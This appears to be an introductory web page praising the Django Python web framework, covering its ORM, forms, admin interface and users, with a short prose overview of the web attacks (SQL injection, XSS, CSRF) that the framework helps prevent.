Django

Django is a high-level Web framework, written in Python, that encourages rapid development and clean, pragmatic design.

 

What is Django?

The Django ORM

The ORM is an incredibly powerful database tool. It handles creation of your database, as well as insert, update, delete queries and some quite advanced querying - although it's not perfect. It supports multiple databases - MySQL, PostgreSQL, Oracle & SQLite are all supported out-of-the-box assuming you have the relevant Python libraries installed.

Forms

Forms are not the most fun thing. While Django doesn't make them fun, it at least does a lot for you. You define some fields and how you want the basic validation to work, and Django creates the HTML adds the error messages and cleans the data so you don't get anything unexpected. The Django forms framework can even generate and update your database from a database model you create, make your job even easier.

Admin

The Django admin is more than just a scaffold. This thing has a wide range of customisations that can be applied and with little to no work could even be deployed as the final admin area of your website - it powers this one.

Who Uses Django?

Playfire a social network for gamers

 

Disqus a large commenting platform

 

News Paper

Why Use Django?

Django is Python

Python is a really nice, elegant & powered language ... and by far my favourite.

Django makes things easier

Django makes things easier for you. It's a complete framework with a lot available - but only if you want it. It tries not to get in the way and if there are things you don't like you just go around. The templating language being a great example of this.

Django Security

Unlike many other frameworks, Django has a very high level of security, including protection from:

SQL Injection

SQL injection is a common exploit in which an attacker alters Web page parameters (such as GET/POST data or URLs) to insert arbitrary SQL snippets that a naive Web application executes in its database directly. It’s probably the most dangerous – and, unfortunately, one of the most common – vulnerabilities out there.

Cross-Site Scripting (XSS)

Cross-site scripting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of <script> tags.

Attackers often use XSS attacks to steal cookie and session information, or to trick users into giving private information to the wrong person (aka phishing).

Cross-Site Request Forgery

Cross-site request forgery (CSRF) happens when a malicious Web site tricks users into unknowingly loading a URL from a site at which they’re already authenticated – hence taking advantage of their authenticated status.

Django has built-in tools to protect from this kind of attack.

Session Protection

Django’s session framework simply doesn’t allow sessions to be contained in the URL.

Exposed Error Messages

Django’s DEBUG setting controls the display of these error messages.